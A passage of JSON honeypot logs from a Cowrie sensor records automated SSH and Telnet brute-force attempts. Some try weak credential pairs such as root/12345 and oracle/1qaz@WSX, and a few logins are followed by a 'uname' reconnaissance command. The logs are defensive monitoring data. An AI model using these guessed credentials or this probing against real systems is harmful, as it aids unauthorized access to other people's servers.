0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:55:06.773879Z","src_ip":"212.227.125.160","session":"53beda701d0b"}
{"eventid":"cowrie.login.success","username":"root","password":"12345","message":"login attempt [root/12345] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:55:07.188381Z","src_ip":"212.227.125.160","session":"53beda701d0b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:55:07.566651Z","src_ip":"212.227.125.160","session":"53beda701d0b"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T05:55:07.567534Z","src_ip":"212.227.125.160","session":"53beda701d0b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:55:07.673258Z","src_ip":"212.227.125.160","session":"53beda701d0b"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:55:07.674499Z","src_ip":"212.227.125.160","session":"53beda701d0b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54954,"dst_ip":"1.2.3.4","dst_port":22,"session":"70561b273ea2","protocol":"ssh","message":"New connection: 212.227.235.229:54954 (1.2.3.4:22) [session: 70561b273ea2]","sensor":"my-vps","timestamp":"2025-08-28T05:55:10.746093Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:55:10.769081Z","src_ip":"212.227.235.229","session":"70561b273ea2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:55:10.896834Z","src_ip":"212.227.235.229","session":"70561b273ea2"}
{"eventid":"cowrie.login.success","username":"root","password":"12345","message":"login attempt [root/12345] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:55:11.467289Z","src_ip":"212.227.235.229","session":"70561b273ea2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:55:11.772611Z","src_ip":"212.227.235.229","session":"70561b273ea2"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T05:55:11.773319Z","src_ip":"212.227.235.229","session":"70561b273ea2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:55:11.918594Z","src_ip":"212.227.235.229","session":"70561b273ea2"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:55:11.919750Z","src_ip":"212.227.235.229","session":"70561b273ea2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43860,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b0c9f47aad0","protocol":"ssh","message":"New connection: 212.227.235.229:43860 (1.2.3.4:22) [session: 0b0c9f47aad0]","sensor":"my-vps","timestamp":"2025-08-28T05:55:25.403231Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:55:25.404201Z","src_ip":"212.227.235.229","session":"0b0c9f47aad0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44686,"dst_ip":"1.2.3.4","dst_port":22,"session":"8c02bfd07f94","protocol":"ssh","message":"New connection: 212.227.125.160:44686 (1.2.3.4:22) [session: 8c02bfd07f94]","sensor":"my-vps","timestamp":"2025-08-28T05:55:25.485339Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:55:25.486537Z","src_ip":"212.227.125.160","session":"8c02bfd07f94"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:55:25.547936Z","src_ip":"212.227.235.229","session":"0b0c9f47aad0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:55:25.590968Z","src_ip":"212.227.125.160","session":"8c02bfd07f94"}
{"eventid":"cowrie.login.failed","username":"es","password":"123","message":"login attempt [es/123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:55:25.903058Z","src_ip":"212.227.125.160","session":"8c02bfd07f94"}
{"eventid":"cowrie.login.failed","username":"es","password":"123","message":"login attempt [es/123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:55:25.997241Z","src_ip":"212.227.235.229","session":"0b0c9f47aad0"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:55:27.008897Z","src_ip":"212.227.125.160","session":"8c02bfd07f94"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:55:27.142971Z","src_ip":"212.227.235.229","session":"0b0c9f47aad0"}
{"eventid":"cowrie.session.connect","src_ip":"191.92.144.10","src_port":49997,"dst_ip":"1.2.3.4","dst_port":23,"session":"54ff4d22cfda","protocol":"telnet","message":"New connection: 191.92.144.10:49997 (1.2.3.4:23) [session: 54ff4d22cfda]","sensor":"my-vps","timestamp":"2025-08-28T05:55:39.219919Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":59526,"dst_ip":"1.2.3.4","dst_port":22,"session":"add5f5d899bc","protocol":"ssh","message":"New connection: 217.72.205.35:59526 (1.2.3.4:22) [session: add5f5d899bc]","sensor":"my-vps","timestamp":"2025-08-28T05:55:42.188196Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:55:42.189348Z","src_ip":"217.72.205.35","session":"add5f5d899bc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38512,"dst_ip":"1.2.3.4","dst_port":22,"session":"e179ea7441fd","protocol":"ssh","message":"New connection: 212.227.125.160:38512 (1.2.3.4:22) [session: e179ea7441fd]","sensor":"my-vps","timestamp":"2025-08-28T05:55:47.679187Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:55:47.751382Z","src_ip":"212.227.125.160","session":"e179ea7441fd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:55:47.866151Z","src_ip":"212.227.125.160","session":"e179ea7441fd"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"1qaz@WSX","message":"login attempt [oracle/1qaz@WSX] failed","sensor":"my-vps","timestamp":"2025-08-28T05:55:48.347771Z","src_ip":"212.227.125.160","session":"e179ea7441fd"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:55:49.466022Z","src_ip":"212.227.125.160","session":"e179ea7441fd"}
{"eventid":"cowrie.session.closed","duration":12.935799360275269,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:55:52.155644Z","src_ip":"191.92.144.10","session":"54ff4d22cfda"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49416,"dst_ip":"1.2.3.4","dst_port":22,"session":"9f2746cedfd0","protocol":"ssh","message":"New connection: 212.227.235.229:49416 (1.2.3.4:22) [session: 9f2746cedfd0]","sensor":"my-vps","timestamp":"2025-08-28T05:55:55.761141Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:55:55.761930Z","src_ip":"212.227.235.229","session":"9f2746cedfd0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:55:55.906068Z","src_ip":"212.227.235.229","session":"9f2746cedfd0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58190,"dst_ip":"1.2.3.4","dst_port":22,"session":"69441efe9dda","protocol":"ssh","message":"New connection: 212.227.235.229:58190 (1.2.3.4:22) [session: 69441efe9dda]","sensor":"my-vps","timestamp":"2025-08-28T05:55:55.919599Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:55:55.920503Z","src_ip":"212.227.235.229","session":"69441efe9dda"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:55:56.064215Z","src_ip":"212.227.235.229","session":"69441efe9dda"}
{"eventid":"cowrie.login.success","username":"root","password":"Password1","message":"login attempt [root/Password1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:55:56.346449Z","src_ip":"212.227.235.229","session":"9f2746cedfd0"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"1qaz@WSX","message":"login attempt [oracle/1qaz@WSX] failed","sensor":"my-vps","timestamp":"2025-08-28T05:55:56.503272Z","src_ip":"212.227.235.229","session":"69441efe9dda"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:55:56.654801Z","src_ip":"212.227.235.229","session":"9f2746cedfd0"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T05:55:56.655580Z","src_ip":"212.227.235.229","session":"9f2746cedfd0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:55:56.801018Z","src_ip":"212.227.235.229","session":"9f2746cedfd0"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:55:56.802377Z","src_ip":"212.227.235.229","session":"9f2746cedfd0"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:55:57.649849Z","src_ip":"212.227.235.229","session":"69441efe9dda"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41456,"dst_ip":"1.2.3.4","dst_port":22,"session":"a37d74aa10b8","protocol":"ssh","message":"New connection: 212.227.125.160:41456 (1.2.3.4:22) [session: a37d74aa10b8]","sensor":"my-vps","timestamp":"2025-08-28T05:56:05.423378Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:56:05.426208Z","src_ip":"212.227.125.160","session":"a37d74aa10b8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:56:05.530307Z","src_ip":"212.227.125.160","session":"a37d74aa10b8"}
{"eventid":"cowrie.login.failed","username":"uftp","password":"uftp","message":"login attempt [uftp/uftp] failed","sensor":"my-vps","timestamp":"2025-08-28T05:56:05.974818Z","src_ip":"212.227.125.160","session":"a37d74aa10b8"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:56:07.082220Z","src_ip":"212.227.125.160","session":"a37d74aa10b8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39936,"dst_ip":"1.2.3.4","dst_port":22,"session":"87d4a15b4f70","protocol":"ssh","message":"New connection: 212.227.235.229:39936 (1.2.3.4:22) [session: 87d4a15b4f70]","sensor":"my-vps","timestamp":"2025-08-28T05:56:09.704684Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:56:09.705569Z","src_ip":"212.227.235.229","session":"87d4a15b4f70"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:56:09.851047Z","src_ip":"212.227.235.229","session":"87d4a15b4f70"}
{"eventid":"cowrie.login.failed","username":"uftp","password":"uftp","message":"login attempt [uftp/uftp] failed","sensor":"my-vps","timestamp":"2025-08-28T05:56:10.289113Z","src_ip":"212.227.235.229","session":"87d4a15b4f70"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:56:11.436604Z","src_ip":"212.227.235.229","session":"87d4a15b4f70"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56016,"dst_ip":"1.2.3.4","dst_port":22,"session":"9620cd097471","protocol":"ssh","message":"New connection: 212.227.125.160:56016 (1.2.3.4:22) [session: 9620cd097471]","sensor":"my-vps","timestamp":"2025-08-28T05:56:18.030123Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:56:18.031121Z","src_ip":"212.227.125.160","session":"9620cd097471"}
